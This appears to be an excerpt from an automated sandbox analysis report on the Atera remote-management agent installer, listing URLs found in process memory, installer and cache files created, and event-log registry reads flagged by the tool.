                                Source: AgentPackageSTRemote.exe, 00000023.00000002.3066742035.00000154216D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000023.00000000.2256494928.0000015420AA2000.00000002.00000001.01000000.0000001A.sdmpString found in binary or memory: https://ps.atera.com/installers/splashtop/win/SplashtopStreamer.exe
                                Source: AgentPackageTicketing.exe, 00000032.00000002.3068186659.00000277DFBB2000.00000002.00000001.01000000.0000004A.sdmpString found in binary or memory: https://ps.atera.com/translations/TicketingTray/
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE803B1000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE803C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE803B1000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE803C6000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B522F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=06242243-00aa-4c7d-a058-04335f7e2536
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=3c8a17d0-a4ef-4bc3-8faa-d15530319950
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=69e28dfb-6bb3-4b9a-9a01-054fe505d5c1
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE800A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=71185755-03f2-4425-a65c-108791d269f5
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE8016C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=cf6b40e8-5a88-4477-9cc7-4f406bdb20ba
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=d8e621d6-a0eb-4f02-ab6a-561594dd673b
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE803B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=e5bd75c1-b13e-46c3-beff-2072d814cee9
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52807000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52807000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B522F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/ef8472c8
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE803C6000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B520CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/ef8472c8-8ede-4877-a4a2
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE800A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.comSYSTPT
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://push.chocolatey.org
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38BD71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://push.chocolatey.org/
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://raw.github.com/ferventcoder/checksum/master/LICENSE
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://raw.githubusercontent.com/wiki/chocolatey/choco/images/gifs/choco_config.gif
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://raw.githubusercontent.com/wiki/chocolatey/choco/images/gifs/choco_install.gif
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://raw.githubusercontent.com/wiki/chocolatey/choco/images/gifs/choco_outdated.gif
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://raw.githubusercontent.com/wiki/chocolatey/choco/images/gifs/choco_search.gif
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://raw.githubusercontent.com/wiki/chocolatey/choco/images/gifs/choco_uninstall.gif
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://raw.githubusercontent.com/wiki/chocolatey/choco/images/gifs/choco_upgrade.gif
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://raw.githubusercontent.com/wiki/chocolatey/choco/images/gifs/chocopro_install_stopped.gif
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rawcdn.githack.com/ajshastri/chocolatey-packages/a698d21b3c63b9ff7e01f442f37cdb7ecf89925a/ic
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2824739173.000001FC60A02000.00000002.00000001.01000000.00000042.sdmpString found in binary or memory: https://rt.services.visualstudio.com/l
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC4821A000.00000004.00000800.00020000.00000000.sdmp, AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC482B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rt.services.visualstudio.com/p
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC4821A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rt.services.visualstudio.com/pcq
                                Source: AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6AC34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ods.opinsights.azure.com/api/logs?api-version=2016-04-01
                                Source: AgentPackageTicketing.exe, 00000032.00000002.3068186659.00000277DFBB2000.00000002.00000001.01000000.0000004A.sdmpString found in binary or memory: https://setup-app-resolver.atera.com
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://sevenzip.osdn.jp/chm/general/formats.htm
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC4821A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://snapshot.monitor
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC482B9000.00000004.00000800.00020000.00000000.sdmp, AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC48036000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://snapshot.monitor.azure.com/
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2824739173.000001FC60A02000.00000002.00000001.01000000.00000042.sdmpString found in binary or memory: https://snapshot.monitor.azure.com/&
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC4821A000.00000004.00000800.00020000.00000000.sdmp, AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC482B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://snapshot.monitor.azure.com/p
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://somelocation.com/
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://somelocation.com/thefile.exe
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://somewhere.com/file-x64.msi
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://somewhere.com/file.msi
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://somewhere.com/file.mst
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://somewhere/bob-x64.exe
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://somewhere/bob.exe
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://somewhere/out/there.msi
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2377234109.000001D73B812000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: https://system.data.sqlite.org/
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2377595858.000001D73B874000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: https://system.data.sqlite.org/X
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2377234109.000001D73B812000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: https://urn.to/r/sds_see
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC482B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westeurope-5.in.applicationinsights.azure.co
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC48114000.00000004.00000800.00020000.00000000.sdmp, AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC482B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westeurope-5.in.applicationinsights.azure.com
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC482B9000.00000004.00000800.00020000.00000000.sdmp, AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC48036000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westeurope-5.in.applicationinsights.azure.com/
                                Source: AgentPackageOsUpdates.exe, 00000034.00000000.2661915081.000001FC474F2000.00000002.00000001.01000000.0000002B.sdmp, AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC48036000.00000004.00000800.00020000.00000000.sdmp, AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC481AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westeurope-5.in.applicationinsights.azure.com/;LiveEndpoint=https://westeurope.livediagnosti
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC482B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westeurope-5.in.applicationinsights.azure.com/api/profiles/
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC482B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westeurope-5.in.applicationinsights.azure.com/pcq
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC482B9000.00000004.00000800.00020000.00000000.sdmp, AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC48036000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westeurope-5.in.applicationinsights.azure.com/v2/track
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC482B9000.00000004.00000800.00020000.00000000.sdmp, AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC48036000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westeurope.livediagnostics.monitor.azure.com/
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC482B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westeurope.livediagnostics.monitor.azure.com/pcq
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/).
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0.html
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38BD71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.howsmyssl.com/
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38BF58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/MPL/1.1/
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                                Source: rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2378384520.000001D73B958000.00000002.00000001.01000000.00000023.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.2377669516.000001D73B882000.00000002.00000001.01000000.00000023.sdmpString found in binary or memory: https://www.nuget.org/packages/NLog.Web.AspNetCore
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80647000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE8028C000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.2188590383.00000280D3882000.00000002.00000001.01000000.00000019.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.2378477877.000001D73B962000.00000002.00000001.01000000.00000024.sdmp, AgentPackageUpgradeAgent.exe, 00000030.00000002.2631969820.00000235BA360000.00000002.00000001.01000000.0000002A.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                                Source: AgentPackageMonitoring.exeString found in binary or memory: https://www.sqlite.org/copyright.html
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2392439100.00007FFDF1A24000.00000002.00000001.01000000.0000001C.sdmpString found in binary or memory: https://www.sqlite.org/copyright.html2
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEBJump to dropped file

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Reads the Security eventlog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                                Reads the System eventlog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\442ace.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2E58.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI31B4.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI46E3.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{E732A0D7-A2F2-4657-AC41-B19742648E45}Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4B97.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4BA8.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4C16.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4D50.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\442ad0.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\442ad0.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6CA1.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\442ad1.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI77D8.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7BC1.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA1C8.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA999.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA9D9.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAB51.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAC6B.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC40B.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC41B.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC499.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC4E9.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\442add.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\442add.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICBDF.tmpJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2E58.tmp-Jump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2E58.tmp-\AlphaControlAgentInstallation.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2E58.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2E58.tmp-\Newtonsoft.Json.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2E58.tmp-\System.Management.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2E58.tmp-\CustomAction.configJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI31B4.tmp-Jump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI31B4.tmp-\AlphaControlAgentInstallation.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI31B4.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI31B4.tmp-\Newtonsoft.Json.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI31B4.tmp-\System.Management.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI31B4.tmp-\CustomAction.configJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI46E3.tmp-Jump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI46E3.tmp-\AlphaControlAgentInstallation.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI46E3.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI46E3.tmp-\Newtonsoft.Json.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI46E3.tmp-\System.Management.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI46E3.tmp-\CustomAction.configJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\InstallUtil.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
